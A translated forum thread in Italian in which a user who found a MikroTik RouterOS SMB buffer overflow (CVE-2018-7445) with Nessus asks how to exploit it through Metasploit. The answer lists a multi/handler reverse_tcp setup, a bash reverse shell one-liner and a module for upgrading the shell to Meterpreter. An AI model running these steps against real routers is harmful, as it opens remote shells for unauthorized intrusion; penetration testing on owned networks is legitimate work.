Nessus ha trovato una vulnerabilità, ma nessun exploit corrispondente su Metasploit: come eseguire con meterpreter

2

Ho eseguito Nessus su una rete locale, ha rilevato una vulnerabilità critica per il router:

MikroTik RouterOS < 6.41.3 SMB Buffer Overflow

(Descrizione della vulnerabilità: Exploit-db )

Ma non riesco a trovare alcun exploit corrispondente su metasploit per questa vulnerabilità. Su msfconsole ha fatto search CVE-2018-7445 ma non ha ottenuto risultati.

C'è un modo per me di usare l'exploit su metasploit, con il meterpreter?

    
posta Johnny Pralo 05.11.2018 - 16:03
fonte

1 risposta

1

In sostanza, è necessario utilizzare l'exploit nel collegamento exploit-db per ottenere una shell, quindi avviare un gestore Metasploit:

use exploit/multi/handler
set LHOST [local ip address]
set LPORT 4444
set payload linux/x86/shell/reverse_tcp
run

Una volta eseguito il gestore del carico, è possibile effettuare una connessione TCP inversa dal router per ottenere una sessione su Metasploit:

bash -i >& /dev/tcp/[local ip address]/4444 0>&1

Quindi esegui uno sfondo della sessione e usa il modulo post/multi/manage/shell_to_meterpreter per aggiornare la shell a una shell Meterpreter.

    
risposta data 05.11.2018 - 17:17
fonte

Leggi altre domande sui tag